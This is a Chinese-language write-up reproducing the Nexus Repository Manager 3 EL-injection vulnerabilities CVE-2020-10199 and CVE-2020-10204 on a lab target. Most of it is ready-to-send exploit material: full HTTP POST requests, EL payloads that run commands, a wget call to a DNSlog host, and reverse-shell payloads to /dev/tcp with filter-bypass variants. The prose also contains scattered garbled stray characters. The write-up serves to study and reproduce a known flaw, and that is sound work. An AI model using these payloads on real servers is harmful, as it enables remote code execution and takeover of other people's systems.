0x00 前言
本次漏洞復(fù)現(xiàn)使用
靶機(jī):vulfocus
0x01 描述
Nexus Repository Manager 3 是一款軟件倉(cāng)庫(kù)祝峻,可以用來(lái)存儲(chǔ)和分發(fā) Maven 晌端、 NuGET 等軟件源倉(cāng)庫(kù)
Nexus Repository Manager官方發(fā)布了CVE-2020-10199捐寥,CVE-2020-10204的漏洞公告暑劝,10199的漏洞需要普通用戶權(quán)限即可觸發(fā),而10204則需要管理員權(quán)限句惯。兩個(gè)漏洞的觸發(fā)原因均是不安全的執(zhí)行EL表達(dá)式導(dǎo)致的
影響版本
Nexus Repository Manager OSS/Pro 3.x <= 3.21.1
默認(rèn)端口:
8081 Sonatype Nexus Repository 管理頁(yè)面
復(fù)現(xiàn)準(zhǔn)備
啟動(dòng)環(huán)境
每次啟動(dòng)環(huán)境映射的端口都不同镐捧,按照實(shí)際映射端口訪問(wèn)就可以看到Web界面了
預(yù)留的用戶名/密碼:
admin/admin
0x02 漏洞復(fù)現(xiàn)(普通賬號(hào)執(zhí)行方法)
此方法普通賬號(hào)和管理員賬號(hào)皆適用
登陸后替換Cookie和CSRF Token,發(fā)送數(shù)據(jù)包循诉,即可執(zhí)行EL表達(dá)式
POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close
{
"name": "internal",
"online": true,
"storage": {
"blobStoreName": "default",
"strictContentTypeValidation": true
},
"group": {
"memberNames": ["$\\A{233*233*233}"]
}
}
DNSlog 測(cè)試
進(jìn)行 DNSlog 嘗試横辆,開(kāi)始嘗試使用 ping 、curl 都無(wú)法成功執(zhí)行 EL 表達(dá)式茄猫,最后嘗試使用了 wget 命令成功獲取請(qǐng)求記錄
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('wget hvqkwp.dnslog.cn')}
反彈shell
開(kāi)始直接使用下面語(yǔ)句進(jìn)行反彈并無(wú)任何反應(yīng)
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('bash -i >& /dev/tcp/xx.xx.xx.xx/6543 0>&1')}
經(jīng)過(guò)資料查閱狈蚤,發(fā)現(xiàn)了存在的問(wèn)題:
https://blog.spoock.com/2018/11/25/getshell-bypass-exec/
經(jīng)過(guò)多次嘗試,最終的payload
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/xx.xx.xx.xx/6543 0>&1')}
$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('/bin/bash -c bash$IFS$9-i>&/dev/tcp/xx.xx.xx.xx/6543<&1')}
2.3 漏洞復(fù)現(xiàn)(管理員賬號(hào)執(zhí)行方法)
此方法只適用于管理員賬號(hào)
POST /service/extdirect HTTP/1.1
Host: 118.193.36.37:64521
Content-Length: 290
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.8501743136715239
Content-Type: application/json
Accept: */*
Origin: http://118.193.36.37:64521
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://118.193.36.37:64521/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.8501743136715239; _ga=GA1.1.1177666056.1593768292; _gid=GA1.1.174097340.1593768292; NXSESSIONID=8c94eba8-2764-4b02-801f-e4c58769cb4d
Connection: close
{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('wget im87gx.dnslog.cn')}"],"roles":[]}],"type":"rpc","tid":89}
注意替換 Cookie 和 CSRF-TOKEN
